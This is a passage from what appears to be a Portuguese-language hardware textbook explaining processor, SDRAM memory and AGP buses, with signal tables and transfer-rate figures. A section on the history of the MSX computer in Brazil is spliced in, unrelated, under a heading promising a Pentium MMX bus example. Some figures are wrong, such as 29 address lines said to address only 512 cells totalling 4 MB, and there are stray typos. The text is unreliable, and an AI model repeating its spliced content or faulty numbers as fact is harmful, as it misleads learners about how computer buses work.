Através deste barramento o processador faz a comunicação com o


seu exterior. Nele trafegam os dados lidos da memória, escritos na
memória, enviados para interfaces e recebidos de interfaces. Pode
ser dividido em três grupos:

 Barramento de dados
 Barramento de endereços
 Barramento de controle

Figura 2
Barramento do processador.

Através do barramento de endereços o processador pode especificar


qual a placa ou interface através da qual quer transmitir ou receber
dados, e também especificar o endereço de memória no qual deseja
ler ou armazenar dados. A maioria dos processadores modernos têm
barramento de endereços com 36 bits, podendo assim endereçar até
64 GB de memória física. O barramento de dados tem 64 bits na mai-
oria dos processadores modernos. O barramento de endereços é
sempre unidirecional, ou seja, os bits são gerados pelo processador.

92
O barramento de dados é bidirecional, ou seja, os dados são ora
transmitidos, ora recebidos pelo processador.

O barramento de controle contém vários sinais que são necessários


ao funcionamento do processador, bem como controlar o tráfego do
barramento de dados. Alguns dos seus sinais são de saída, outros
são de entrada, outros são bidirecionais.

Existem sinais para indicação do tipo de operação (leitura ou escrita),


sinais se especificação de destino/origem de dados (memória ou
E/S), sinais de sincronismo, sinais de interrupção, sinais que permi-
tem a outro dispositivo tomar o controle do barramento, sinais de
clock, sinais de programação e diversos outros.

Na maioria dos casos, o barramento do processador é o mais veloz


existente em uma placa de CPU, mas isto nem sempre ocorre.
Por exemplo, uma placa de CPU pode ter o processador operando
com barramento de 100 MHz e as memórias operando a 133 MHz.
Ter a memória mais rápida é vantajoso no caso de placas com vídeo
on-board, já que estaria sendo acessada, ora pelo processador, ora
pelos circuitos de vídeo. Neste caso o barramento da memória seria o
de tráfego mais intenso do computador.

Velocidade do barramento do processador

Os barramentos de todos os processadores modernos operam de


forma síncrona, ou seja, os eventos são sincronizados com um sinal
de clock. Nos processadores antigos, cada operação era feita em
dois, três ou mais períodos de clock. Nos processadores modernos,
cada operação pode ser feita em um só período de clock. Infelizmen-
te nem sempre as memórias e outros dispositivos são tão velozes a
ponto de acompanhar esta velocidade, e assim são feitas prorroga-
ções chamadas de wait states.

Por exemplo, um Pentium III operando com 64 bits (8 bytes) e clock


de 100 MHz externos, oferece uma taxa de transferência máxima de
800 MB/s (100 MHz x 8). Na prática este valor não é alcançado, pois
nem todas as transferências podem ser feitas em um único ciclo. Por
exemplo, todas as memórias modernas podem transferir dados a

93
cada período de clock, porém o primeiro dado demora mais estar
pronto, é o que chamamos de latência. Devido às latências das me-
mórias e de outros dispositivos mais lentos, a taxa de transferência
máxima nunca é obtida na prática.

A velocidade máxima teórica de um barramento é um ponto bastante


importante, por isso vamos discutir o assunto com mais detalhes.

Tanto é assim que ao lançar novos processadores (como o caso do


Athlon/Duron e do Pentium 4 e Itanium), a Intel e AMD se preocupa-
ram em oferecer taxas de transferência bem elevadas.
Para calcular a taxa de transferência, basta multiplicar o clock externo
do processador pelo número de bytes do seu barramento de dados.
No caso de processadores que operam com DDR (Athlon e Duron) o
clock deve ainda ser multiplicado por 2, e para processadores que
operam com QDR (Quad Data Rate, como é o caso do Pentium 4 e
do Xeon), o clock deve ser multiplicado por 4.

A tabela a seguir mostra a taxa de transferência máxima teórica dos


principais processadores produzidos nos últimos anos.

Processador Clock ex- Trans- Taxa de


terno ferên- transferência
cias por máxima teó-
ciclo rica
Pentium / Pentium MMX 66 MHz 1 533 MB/s
K6-2 / K6-III 100 MHz 1 800 MB/s
Pentium II / Celeron 66 MHz 1 533 MB/s
Pentium II 350+ 100 MHz 1 800 MB/s
Pentium III, Celeron-800+ 100 MHz 1 800 MB/s
Pentium IIIB 133 MHz 1 1066 MB/s
Atlhlon / Duron 100 MHz 2 1600 MB/s
thlon / Duron 133 MHz 2 2133 MB/s
Pentium 4, Xeon 100 MHz 4 3200 MB/s

94
As latências das memorais impedem que essas taxas sejam obtidas
na prática. Um outro fator pode ainda fazer com que a taxa real seja
ainda menor.

Por exemplo, se um processador Athlon ou Duron operando com


barramento de 100 MHz (200 MHz efetivos usando DDR) for ligado a
memórias PC133, o desempenho do seu barramento será menor que
o de um processador que use barramento de 133 MHz, e não de 200
MHz.

Exemplo de barramento: Pentium MMX e Socket 7

O MSX faz parte da família de computadores baseados no velho e


eficiente processador de 8 bits da Zilog, o Z-80. Esses computadores
começaram a aparecer em 1983 tentando estabelecer um padrão em
computadores pessoais, assim como é o sistema VHS é em vídeo.
Eles foram muito populares na Asia (Japão, Coreia), Europa (Inglater-
ra, Holanda, França, Espanha), na América do Sul (Brasil, Chile, Ar-
gentina) e na Antiga União Soviética mas, são praticamente desco-
nhecidos nos EUA. Entretanto em 1988 o MSX-1 começava a lenta-
mente desaparecer, o mundo começava a ver o MSX-2 (uma grande
evolução), um ano depois o MSX-2 Plus e em 1990 o MSX Turbo-R
(de 16 bits) o primeiro MSX de 16 bits, mas pouco depois começou a
finalmente desaparecer sendo substituído pelos PC's que hoje domi-
nam totalmente o mercado. MSX quer dizer MicroSoft e Xtended, foi
criado em parceria entre a Microsoft (Bill Gates), e a ASCII japonesa
(Kay Nishi). Até final de 87 MSX era marca registrada da Microsoft
Corp. Depois, Bill desfez sua sociedade com Nishi e voltou seus es-
forços totalmente para o padrão PC.

O MSX foi sem dúvida o melhor micro de 8 bits da história, sendo


melhor que muitos de 16 bits. Ele é um computador muito bom, espe-
cialmente para fins educacionais, como foi claramente indicado no
caso da antiga URSS.

O Ministro Russo da Educação, na época, comprou centenas de


MSXs (e posteriormente MSX2s). Eram agrupados em chamados
"Sistema computadorizado de salas de aula" de 10 a 16 máquinas
interligadas numa pequena rede.

95
Uma grande geração de programadores nasceram usando esses
computadores. O MSX, também era bastante eficiente em jogos
(principalmente o MSX2) e tem um grande número de jogos escritos
ou adaptados para ele. A maioria desses jogos eram bem superiores
ao jogos do PC na época.

O MSX no Brasil

Dois assuntos são fundamentais para se entender o MSX no Brasil: a


imprensa escrita (principalmente as revistas) e o software. Até o ad-
vento do MSX, além de uns poucos abnegados, tudo o que existia
eram traduções e cópias, nenhum outro micro tinha produzido tanto
software brasileiro genuíno. Tá certo que houve muita pirataria, mas
com ele apareceram os primeiros produtores de programas brasilei-
ros.

O MSX surgiu no brasil em 1985 e era fabricado por duas empresas:


a Sharp e a Dynacom. A segunda produzia uma máquina extrema-
mente inferior, com apenas 8kb de RAM, componentes de péssima
qualidade e, por isso, foi rapidamente retirado do mercado. Já o MSX
da Sharp chegou e em pouco tempo fulminou seus concorrente dire-
tos de 8bits (os clones de Apple-II e ZX-SPectrum), sendo em 1988,
padrão do mercado, se tornando mais popular (pelo menos a nível
doméstico) que os PCs.

Pouco depois, surgiu o Expert 1.0 da Gradiente, entretanto, ele trazia


vários inconvenientes: a sua tabela de caracteres não seguia o pa-
drão e tinha algumas incompatibilidades a nível de endereços com os
outros MSX. Algo semelhante ocorria com o Hotbit branco da sharp,
porém sem os problemas de tabela ascii.

Em 1987 surge o Hotbit preto e o Expert 1.1, que tinham a mesma


tabela de caracteres e resolvidos esses problemas. No mesmo ano
surgem os primeiros kits de transformação 2.0 no Brasil, e lá fora, é
lançado o MSX 2+.

Os kits 2.0 dessa época eram exclusivos para o Expert, tendo o in-
conveniente de que se perdia o seu slot traseiro, o que não impediu a

96
troca, por muitos, de seus Hotbits por Experts, além do que, o gabine-
te da SHARP era muito pequeno, não havendo espaço físico para o
kit de MSX2.

Apesar da primeira empresa a fabricar kits ter sido a MPO, a maior foi
a DDX e a melhor foi a ACVS. O kit (DDX) tinha o problema de, as
vezes, a interface de data corder parar de funcionar, mas, ninguém
(nem os técnicos) sabia explicar o porque. Nunca foi fabricado um
MSX2 no Brasil, o que ocorria era uma "transformação" com a insta-
lação de um Kit chamado Kit MSX-2 e o mais popular era fabricado
pela DDX, principal fabricante de acessórios. Apenas o Expert podia
ser transformado para MSX2 já que o Hotbit tinha, entre outros, pro-
blemas de espaço gabinete.

Outra empresa, a ACVS, também fazia kits de MSX2 e 2+, por sinal
melhores que os kits da DDX, embora não tão populares. Chegou a
lançar um cartucho que transformava o MSX em MSX2/2+ acabando
com o problema da transformação do Hot Bit, o que isso não faria
diferença, pois a Sharp já tinha parado de fabricar o seu MSX Hot-Bit.

Em 88/89, quando todos esperavam um MSX 2 ou 2+ nacional, a


Gradiente lançou o MSX PLUS e MSX DD PLUS. Uma tremenda
besteira, primeiro porque o MSX1 já estava super ultrapassado e
segundo porque esses novos Experts davam uma série de proble-
mas.

Foi a gota d'agua para a existência do MSX no Brasil.

Invenções Nacionais

No Brasil também se inventou algumas coisas para o MSX, a mais


popular delas foi a Megaram, que era usada para rodar os jogos co-
piados de cartuchos (megaroms) originais. A Megaram foi inventada
pela ACVS (Ademir Carchano) mas, foi a DDX que a popularizou.
Existiam vários tipos de megaram: a megaram de 128 e 256, a Mega-
ram Disk de 256, 512 e 768.

A principal diferença entre a Megaram e a Megaram Disk é que a


segunda vinha com sistema operacional e podia ser usada como

97
drive virtual. Apenas o jogo Metal Gear 2 fazia uso da Megaram de
512. Outra coisa que inventaram era o Multi Drive, que era um drive
de 5 1/4 com um botão que fazia ele formatar discos de 360K em
720Kb. Isso porque tinha muitos jogos de MSX2 em disquetes de
720K e por alguma razão drives de 3 1/2 nunca fizeram sucesso no
Brasil.

Também existia o expansor de slots, já que os 2 slots do MSX já não


eram em número suficiente. O melhor expansor de slot fabricado foi o
DDX Expander, que tinha como principal característica o seu chama-
mento, ou seja não precisa ficar tirando e colocando cartucho, cada
slot tinha um botão de liga/desliga para cada cartucho.

Sempre encontramos nos manuais dos processadores, disponíveis


no sites dos seus fabricantes, especificações detalhadas sobre seus
barramentos. Apenas como ilustração, mostraremos a seguir algumas
informações sobre o barramento do processador Pentium MMX,
compatível com os utilizados por outros processadores para o Socket
7.

A figura 3 mostra a numeração dos pinos do processador, bem como


os nomes recebidos por cada um desses pinos.

Figura 3
Pinagem do Pentium MMX.

98
Observe que vários pinos têm as indicações VSS, VCC2 e VCC3. Os
53 pinos VSS são ligados ao terra da placa de CPU (tensão de 0
volts). Os 28 pinos de VCC3 são para a tensão externa do processa-
dor, com 3,3 volts. Os 25 pinos de VCC2 recebem no caso do Pen-
tium MMX, uma alimentação de 2,8 volts, porém em outros processa-
dores esta alimentação tem valores diferentes, e normalmente meno-
res.

Esta tensão alimenta o núcleo do processador. O uso de vários pinos


de alimentação serve para garantir uma melhor distribuição de cor-
rentes dentro do chip e ao longo da placa de CPU.

Os barramentos de dados e de endereços, são ao todo 29 pinos de


endereços (A3 a A31), com os quais podem ser endereçadas 512
células de 64 bits, totalizando 4 MB. Como cada célula de 64 bits
pode ter seus bytes endereçados individualmente, este processador
tem mais 8 sinais de controle (BE0-BE7) que fazem este endereça-
mento adicional. Por exemplo, o processador pode especificar uma
célula de 64 bits qualquer e através dos sinais BE0-BE7, acessar
apenas o valor de 8 bits armazenado no 3o byte desta célula, ou o
valor de 16 bits armazenado no 5o e no 6o, bytes, ou ainda acessar o
valor de 32 bits encontrado no 2o, 3o, 4o e 5o byte.

Pode ainda usar a célula inteira como um valor de 64 bits, ou então


obter esses 64 bits, parte da célula atual e parte da célula seguinte. A
figura 4 mostra anda os 64 pinos que formam o barramento de dados
(D0 a D63).

99
Figura 4

O mais complexo barramento do processador é o do controle, onde


encontramos uma grande miscelânea de sinais.

Alguns são de fácil entendimento, bastando ter conhecimentos bási-


cos sobre o funcionamento externo de um processador.

Vamos apresentar alguns desses sinais, apenas para fins ilustrativos.

Para obter mais detalhes específicos sobre o funcionamento de cada


um desses sinais, é preciso fazer o download do manual do proces-
sador de interesse.

Esses manuais são encontrados nos sites dos fabricantes, como In-
tel, AMD e VIA.

100
Aqui vão portanto as descrições de alguns desses sinais:

A20M Usado para dar acesso à chamada memória HMA,


que consiste nos primeiros 64 kB localizados após o
endereço 1M. É usado quando o processador opera
no Modo Real, ou seja, o mesmo utilizado pelo MS-
DOS.
ADS Address Strobe. Indica que o processador está inici-
ando um novo ciclo. Os ciclos podem ser de leitura
da memória, escrita na memória, leitura de I/O, escri-
ta em I/O, etc.
AP e EADS Usados para geração e checagem de paridade no
barramento de endereços.
BF0 e BF1 Indica o multiplicador usado para definir o clock inter-
no, em função do clock extenro (2x, 2,5x, 3x e 3,5x,
no caso do Pentium MMX). Processadores como o
K6-2 possuem ainda um pino adicional BF2 para a
definição de multiplicadores maiores. Esses pinos
são ligados aos jumpers da placa de CPU que fazem
a programção dos multiplicadores.
BRDY Indica ao processador se a atual transferência em
modo burst já está finalizada ou se devem ser usa-
dos wait states.
CLK Através desta entrada o processador recebe o seu
clock externo.
CPUTYP Usado para distinguir entre processador primário e
secundário, em placas equipadas com mais de um
processador.
D/C Data/Code. Através deste sinal o processador indica
se está fazendo um acesso a dados ou a instruções
de programas.
DP0-DP7 Usados para geração e controle de paridade no bar-
ramento de dados. Cada um desses 8 sinais repre-
senta a paridade de 8 bits do barramento de dados.
FERR Floating Point Erros. Usado para indicar a ocorrência
de um erro de ponto flutuante, resultante de uma
operação matemática inválida feita pela unidade de
ponto flutuante, como uma divisão por zero ou raiz

101
quadrada de um número negativo.
HOLD Por esta entrada o processador recebe uma requisi-
ção para que entre em alta impedância (tristate),
possibilitando que outro chip tome o controle do bar-
ramento. É usado em transferências de DMA e Bus
Mastering.
HLDA HOLD Acknowledge. O processador informa que está
entrando em modo de tristante. A partir daí o barra-
mento pode ser usado por outros chips.
M/IO O processador indica se está acessando uma posi-
ção de memória ou uma interface de I/O (entrada e
saída).
R/W O processador indica se está realizando uma opera-
ção de leitura ou escrita.
RESET Ao receber um comando nesta entrada, o processa-
dor realiza seu processo de RESET interno. Este
sinal deve ser ativado mediante o botão RESET do
gabinete, e também quando o computador é ligado
(Power-on RESET).

Esses são apenas alguns dos sinais de controle deste processador,


que são encontrados também nos processadores mais modernos.

A intenção aqui não foi descrever detalhadamente todos os sinais,


mas apenas dar ao aluno uma ideia do tipo de função realizada por
esses sinais.

O barramento das memórias

Nas placas de CPU antigas, as memórias eram ligadas diretamente


ao barramento do processador, através de chips chamados buffers
bidirecionais.

Esses chips tinham como único objetivo amplificar a corrente vinda do


processador, permitindo que o barramento de dados fosse ligado a
um número grande de chips de memória.

102
Portanto, a velocidade do barramento do processador era igual à
velocidade do barramento das memórias.

Velocidade do barramento das memórias

Atualmente as memórias são ligadas ao processador através do


chipset. A função do chipset nesta conexão não é de apenas amplifi-
car corrente. A maioria dos chipsets possui registradores que permi-
tem que a memória opere de forma assíncrona ao processador, ou
seja, com um clock diferente.

Alguns chipsets podem ter o processador operando a 100 MHz e as


memórias a 66, ou 133 MHz. Outros podem ter o processador ope-
rando a 200 MHz e as memórias a 133. Existem vários outros exem-
plos de clocks diferentes.

Nesses casos dizemos que a memória está operando de forma as-


síncrona ao processador.

Podemos encontrar barramentos de memória operando com diversas


velocidades:

Tipo de memória Clock Transfe- Taxa de transferência


rências máxima teórica
por ciclo
FPM, EDO 66 MHz 1/3 176 MB/s (*)
SDRAM PC66 66 MHz 1 533 MB/s
SDRAM PC100 100 MHz 1 800 MB/s
SDRAM PC133 133 MHz 1 1067 MB/s
DDR200 100 MHz 2 1600 MB/s
DDR266 133 MHz 2 2133 MB/s
DDR300 150 MHz 2 2400 MB/s
DDR333 166 MHz 2 2666 MB/s
DDR400 200 MHz 2 3200 MB/s
RDRAM 100 MHz 4 3200 MB/s (**)

103
(*) Memórias FPM e EDO gastam de 2 a 4 ciclos em Page Mode
para fazer cada transferência, por isso consideramos uma média de 3
ciclos para cada transferência, ou 1/3 de transferência a cada ciclo.

(**) Um módulo RDRAM opera com 1600 MB/s, porém são usados
aos pares, resultando em 3200 MB/s. Note ainda que a DDR SDRAM
mais veloz indicada na tabela é a DDR400, porém na época em que a
RDRAM oferecia 3200 MB/s, a DDR mais veloz era a DDR266. Jun-
tamente com a chegada de chips DDR mais velozes, chegarão tam-
bem ao mercado chips RDRAM tambem com maior velocidade.

As taxas de transferência mostradas na tabela acima são meros limi-


tes teóricos, e nunca são obtidos na prática. São taxas momentâneas
que vigoram apenas quando a transferência se dá em modo burst.

Essas taxas não são sustentadas por períodos significativos, já que a


cada 3 transferências em que usam um só ciclo, é exigida uma trans-
ferência inicial que dura 2 ou 3 ciclos (latência 2 ou 3), resultando em
temporizações como 2-1-1-1 ou 3-1-1-1, o que resulta em 0,8 e 0,75
transferências por ciclo, em média. Mais tempo é perdido antes de
cada transferência, ao serem usados os comandos de leitura e gra-
vação, onde são as formas de onda dos acessos aos vários tipos de
memória.

Finalmente um outro fator contribui para reduzir ainda mais o desem-


penho, que é a atuação da cache. A maioria dos acessos à memória
passam pelas caches do processador, mas certos ciclos podem ser
feitos no modo uncached. O processador estaria neste caso fazendo
leituras e escritas diretamente na memória, e sem usar o modo burst
(transferências da cache são feitas em grupos de 4 acessos consecu-
tivos).

Os sinais de um barramento de memória

Existem algumas diferenças, principalmente no número de bits do


barramento de dados e de endereços dos chips de memória. Já o
barramento de memória não admite variações.
Existe um padrão que deve ser seguido por todos os fabricantes. Por
exemplo, os barramentos dos módulos SDRAM DIMM/168 devem ter

104
sempre 64 ou 72 bits. Diferenças podem existir nos barramentos de
endereços, já que módulos de maior capacidade exigem mais bits
para seu endereçamento.

Entretanto, no mesmo soquete onde instalamos um módulo de 512


MB, também precisam ser suportados módulos de menores capaci-
dades, o que resulta em variações no número de bits de endereços.

Essas diferenças não são uma despadronização. O que ocorre é que


o barramento deve ser compatível com módulos de diferentes capa-
cidades.

Outros sinais são padronizados em módulos de qualquer capacidade.


Por exemplo, os sinais RAS e CAS dos módulos SDRAM DIMM/168
devem sempre ocupar os pinos 115 e 111, respectivamente.

A seguir apresentamos uma breve descrição dos mais importantes


sinais de um barramento de SDRAM DIMM/168.

105
RAS Row Address Strobe. Ligado diretamente aos
pinos de RAS dos chips de memória encontrados
nos módulos DIMM/168.
CAS Column Address Strobe. Ligado diretamente aos
pinos de CAS dos chips de memória.
WE Write Enable. Também ligado nos pinos de mes-
mo nome nas memórias, é usado para indicar se
a atual operação é de leitura (bit 1) ou escrita (bit
0).
CK0-CK3 São sinais idênticos e transmitem aos chips do
módulo, os sinais de clock necessários aos seu
funcionamento. Em módulos PC133, este clock é
de 133 MHz.
DQ0-DQ63 São os 64 bits do barramento de dados do módu-
lo.
CB0-CB7 São 8 bits adicionais usados para checagem de
erros (Paridade ou ECC)
A0-A12 Barramento de endereços, especifica a célula de
memória a ser acessada.
BA0, BA1 Selecionamento de banco. Cada chip de SRAM
possui 4 bancos internos. Esses dois bits são
usados para o selecionamento do banco deseja-
do. O mesmo selecionamento é enviado a todos
os chips do módulo.
S0, S1, S2, S3 Selecionamento de banco dentro do módulo. Exis-
tem módulos de 1 e de dois bancos. Normalmente
os de 1 banco usam chips de um só lado, enquan-
to os de 2 bancos possuem chips em ambos os
lados. O primeiro banco é sempre ativado pelos
sinais S0 e S2, enquanto o segundo banco, quan-
do existe, é ativado pelos sinais S1 e S3.
DQMB0- Cada um desses 8 bits de controle ativa o bits
DQMB7 consecutivos do barramento de dados do módulo.
DQMB0 habilita os bits DQ0-DQ7; DQMB1 habili-
ta os bits DQ8-DQ15, e assim por diante, até
DQMB7 que habilita os bits DQ56-DQ63. Através
desses controles, o chipset, mediante comando
apropriado do processador, pode acessar grupos

106
de 8, 16, 32 ou 64 bits na célula endereçada. Isso
é útil, por exemplo, quando é preciso gravar um
dado em um único byte, ou em outras porções
menores que os 64 bits do barramento de dados
do módulo.
VCC Alimentação de +3,3 volts.
VSS Ligados ao terra

Células de memória em um módulo DIMM têm 64 bits, ou seja, 8


bytes. É interessante observar como essas células são endereçadas.
São usados 3 grupos de sinais:

S0, S1, S2 e S3 Esses sinais fazem a distinção entre módulos de


face simples e de face dupla. Nos módulos de
face simples, devem ser ativados simultaneamen-
te os sinais S0 e S2. Nos módulos de face dupla,
os sinais S0 e S2 ativam os chips de uma face, e
os sinais S1 e S3 ativam os chips da outra face.
Mais especificamente:
S0 ativa os bits DQ0-DQ31 da primeira face
S2 ativa os bits DQ32-DQ63 da primeira face
S1 ativa os bits DQ0-DQ31 da segunda face
S3 ativa os bits DQ32-DQ63 da segunda face

Portanto esses sinais podem representar até 2


combinações:
S0 e S2 ativos
S1 e S3 ativos
BA0, BA1 Esses sinais são enviados a todos os chips do
módulo. Servem para selecionar um dos 4 bancos
internos que um chip de SDRAM pode ter. Portan-
to esses sinais podem representar 4 combina-
ções:
Banco 0: BA1=0 e BA0=0
Banco 1: BA1=0 e BA0=1
Banco 2: BA1=1 e BA0=0

107
Banco 3: BA1=1 e BA0=1
A0-A11 ou Dependendo da capacidade do módulo, podem
A0-A12 existir 12 bits (A0-A11) ou 13 bits (A0-A12) de
endereçamento. Este grupo de bits é usado duas
vezes para indicar a linha e a coluna desejada,
juntamente com os sinais RAS e CAS. Podem
portanto fornecer nas duas etapas, 24 ou 26 bits
de endereços. Desta forma é possível endereçar
16M (224) ou 64M (226) células.

Sendo assim, a capacidade de um módulo de memória depende ob-


viamente do número e da capacidade dos chips, mas também deve
estar de acordo com o número de faces e do número de bits de ende-
reço. Por exemplo, para módulos com 12 bits de endereços e face
dupla, a capacidade máxima permitida é de:16M x 2 bancos por mó-
dulo x 4 bancos internos x 8 bytes por célula = 1024 MB.

A tabela seguinte mostra as capacidades máximas dos módulos em


função do número de bits de endereços e do número de faces:

Endereços Face Capacidade máxima


A0-A11 Simples 512 MB
A0-A11 Dupla 1024 MB
A0-A12 Simples 2048 MB
A0-A12 Dupla 4096 MB

É claro que a utilização depende também da capacidade de cada


chip. Quando não existem chips com capacidade suficiente para criar
um módulo de alta capacidade e face simples, são usadas ambas as
faces do módulo, com os chips disponíveis.

Praticamente todos os sinais do barramento de memória passam por


todos os soquetes. Por exemplo, o mesmo barramento de dados
DQ0-DQ63 passa por todos os soquetes e vai até o chipset. O mes-
mo ocorre com o barramento de endereços e sinais de RAS e CAS.
Alguns sinais entretanto são distribuídos individualmente cada um
dos soquetes. É o caso dos sinais de clock, que por serem de fre-
quência muito elevada, são fornecidos em “cópias individuais” para

108
cada soquete. Isso evita que os sinais de clock sejam deteriorados,
coisa que normalmente ocorre em pequena escala quando um sinal
digital é ligado em muitos chips. A maioria dos chipsets possui vários
sinais de clock, todos iguais e sincronizados, mas para serem envia-
dos separadamente para cada soquete de memória.

Sempre que vários circuitos semelhantes são ligados em paralelo é


preciso que algum sinal digital faça o selecionamento individual do
circuito desejado, caso contrário todos os circuitos tentariam fornecer
dados ao mesmo tempo.

Digamos por exemplo que um PC tem 256 MB de memória, formados


por dois módulos DIMM/168 com 128 MB cada. O chipset precisa
saber que endereços de 0 até 128 M pertencem ao primeiro módulo,
e que endereços de 128 M a 256 M pertencem ao segundo módulo
(note que a rigor o primeiro módulo termina no endereço 128M–1,
enquanto o segundo começa exatamente no endereço 128M). Os
sinais S0, S1, S2 e S3 de cada soquete de memória são usados para
este propósito. O chipset possui vários bits de endereçamento atra-
vés dos quais podem ativar os sinais S0, S1, S2 e S3 de cada soque-
te de memória, de forma individual. Através do endereço desejado
pelo processador, o chipset sabe exatamente qual módulo de memó-
ria o contém, e ativa os sinais de selecionamento de banco adequa-
dos.

Sinais do controlador de memória do chipset Intel 815

Figura 7

109
A figura 7 mostra os sinais do controlador de memória contido no
chipset Intel i815. Esses sinais têm correspondência direta com o
barramento dos soquetes DIMM/168 das memórias SDRAM. Por
exemplo, os sinais SMAA[12:0] (o mesmo que SMAA0, SMAA1, ...,
SMAA12) são o barramento de endereços das memórias. Os sinais
SDQM[7:0] são ligados diretamente aos pinos DQMB dos soquetes
de memória. Os sinais SRAS, SCAS e SWE são ligados diretamente
aos pinos RAS, CAS e WE dos soquetes. Já os sinais SCSA[5:0] e
SCSB[5:0] são usados para ligações individuais nos pinos S0, S1, S2
e S3 de cada soquete de memória. Este chipset permite usar até 3
módulos DIMM/168, que devem ter seus sinais de selecionamento
ligados ao chipset da seguinte forma:

DIMM0 DIMM1 DIMM2


S0 = SCSA0 S0 = SCSA2 S0 = SCSA4
S2 = SCSB0 S2 = SCSB2 S2 = SCSB4
S1 = SCSA1 S1 = SCSA3 S1 = SCSA5
S3 = SCSB1 S3 = SCSB3 S3 = SCSB5

O arranjo é mostrado na figura 8. Note que cada soquete DIMM está


ligado a sinais SCSA e SCSB apropriados, responsáveis pelo seu
selecionamento. A maioria dos demais sinais são ligados em paralelo,
aos três soquetes.

Figura 8

110
Uma descrição completa de todos os barramentos de memória seria
inoportuna neste momento. Procuramos portanto explicar o funcio-
namento do barramento de memória, tomando como exemplo a
SDRAM. O barramento da DDR SDRAM tem sinais bastante pareci-
dos, exceto pela taxa de dados dupla.

Barramento AGP

Este barramento foi lançado em 1997 pela Intel, especificamente para


acelerar o desempenho de placas de vídeo em PCs equipados com o
Pentium II e processadores mais modernos. Trata-se do Acelerated
Graphics Port. É formado por um único slot, como o mostrado na
figura 9. Observe que este slot é muito parecido com os utilizados no
barramento PCI, mas existem diferenças sutis do ponto de vista me-
cânico. Fica um pouco mais deslocado para a parte frontal do compu-
tador, além de possuir uma separação interna diferente da existente
no slot PCI. Desta forma, é impossível encaixar neste slot, uma placa
que não seja AGP.
Figura 9
Slot AGP.

O AGP é um slot solitário, usado exclusivamente para placas de ví-


deo projetadas no padrão AGP. Muitos modelos de placas de vídeo
são produzidas nas versões PCI e AGP (ex: Voodoo 3 3000 AGP e
Voodoo 3 3000 PCI). A principal vantagem do AGP é a sua taxa de
transferência, bem maior que a verificada no barramento PCI.

111
A figura 10 mostra uma placa de vídeo AGP. Observe a posição do
seu conector, mais afastado da parte traseira da placa, o que não
ocorre no padrão PCI.
Figura 10
Placa de vídeo AGP.

Placas de CPU com slot AGP começaram a se tornar comuns a partir


de 1998. As primeiras placas de CPU a apresentar slot AGP foram as
que usavam o chipset Intel i440LX, para Pentium II, e depois as que
usavam o i440BX. Outros fabricantes de chipsets passaram a desen-
volver produtos que também davam suporte ao barramento AGP.
Placas de CPU para a plataforma Super 7 (K6, K6-2, etc.) também
passaram a apresentar slot AGP. Atualmente todas as placas de CPU
de alto desempenho apresentam um slot AGP. Por outro lado, muitas
placas de CPU para PCs de baixo custo, tipicamente as que possuem
vídeo on-board, não possuem slot AGP, com raras exceções.

AGP e vídeo on-board

Foram produzidas várias placas de CPU com vídeo on-board, sem


slot AGP, entretanto com os circuitos de vídeo internamente ligados
ao barramento AGP. Em outras palavras, essas placas possuem bar-

112
ramento AGP mas não possuem slot AGP. Elas têm os circuitos de
vídeo embutidos, ligadas ao barramento AGP, porém não permitem
que o usuário desative o vídeo on-board e instale uma placa de vídeo
AGP.

Como na maioria dos casos o vídeo on-board é de baixo desempe-


nho (mesmo sendo AGP), o usuário que quiser melhorar o desempe-
nho do vídeo precisa se contentar com uma placa de vídeo PCI.

Existem entretanto placas de CPU com vídeo on-board mas que pos-
suem um slot AGP disponível para expansões. Placas de CPU com
esta característica podem ser usadas para montar computadores
simples, mas que podem posteriormente ser convertidos em modelos
mais avançados, através da instalação de placas de expansão apro-
priadas.

As várias voltagens do AGP

Desde que o barramento AGP foi criado, várias versões foram lança-
das no que diz respeito à voltagem e velocidade. As primeiras ver-
sões operavam com 3,3 volts. As placas de CPU tinham slots AGP
operando com 3,3 volts (a exemplo das memórias, chipsets e o bar-
ramento externo dos processadores). As placas de vídeo AGP tam-
bém operavam com os mesmos 3,3 volts, de forma compatível com a
placa de CPU. Inicialmente foi lançado o AGP de velocidade simples
(AGP 1x), depois o AGP 2x e o AGP 4x, duas a 4 vezes mais velo-
zes, respectivamente.

Para possibilitar a operação em modo 4x, os níveis de voltagem fo-


ram alterados para 1,5 volts. Surgiram então os slots AGP para 1,5
volts, capazes de operar exclusivamente com este nível de voltagem,
e os slots AGP universais, capazes de operar tanto com 1,5 como
com 3,3 volts. Da mesma forma existem placas AGP de 3,3 volts,
placas AGP de 1,5 volts e placas AGP universais.

A nova versão 3.0 da especificação AGP, que suporta o modo de


transferência em 8x, opera com tensão de 0,7 volts, entretanto é utili-
zado o mesmo tipo de soquete para placas de 1,5 volts. Para manter
compatibilidade total, tanto as placas de CPU quanto as placas de

113
vídeo AGP 3.0 são capazes de operar tanto com 0,7 volts quanto com
1,5 volts. Ambas as placas são identificadas por novos sinais
MB_DET e GC_DET, através dos quais as voltagens corretas são
selecionadas.

Note que essas tensões de 3,3 volts, 1,5 volts e 0,7 volts não se refe-
rem necessariamente ao funcionamento dos chips da placa. Elas se
aplicam obrigatoriamente na comunicação entre a placa de vídeo e a
placa de CPU, ao longo do slot. Uma placa de vídeo pode ter seus
chips operando, por exemplo, com 2,5 volts mas usar tensões de 1,5
volts na comunicação com a placa de CPU. Portanto quando dizemos
“placa AGP de 3,3 volts”, ou “placa AGP de 1,5 volts” ou “placa AGP
de 0,7 volts”, estamos nos referindo apenas à voltagem usada pelos
sinais digitais que trafegam ao longo do slot.

Figura 11
Os vários tipos de slots AGP.

A figura 11 mostra as diversas versões de slots AGP. O slot de 3,3


volts possui um chanfro localizado mais próximo da parte traseira da
placa de CPU. O slot AGP de 1,5 volts tem o chanfro na posição in-
versa. Placas de vídeo AGP possuem conectores com chanfros cor-
respondentes que se encaixam nos chanfros dos slots. Isto impede,

114
por exemplo, que uma placa de 1,5 volts seja encaixada em um slot
de 3,3 volts, e vice-versa.

Podemos ainda encontrar slots AGP universais e placas AGP univer-


sais. Um slot AGP universal não possui chanfro, e está preparado
para operar tanto com 3,3 como com 1,5 volts. A placa instalada é
reconhecida e o slot passa a operar com a voltagem apropriada. Da
mesma forma encontramos placas AGP universais, com dois chan-
fros. Elas podem ser encaixadas tanto nos slots de 1,5 como nos de
3,3 volts.

Figura 12
Placas AGP com diferentes posições de chanfros.

Outro ponto importante é a velocidade de operação. As velocidades


suportadas são 1x, 2x, 4x e 8x. Quando uma placa AGP é encaixada
em um slot AGP de voltagem compatível (note que é impossível fazer
o encaixe quando as voltagens não são compatíveis), prevalecerá a
máxima velocidade que seja suportada simultaneamente pela placa e
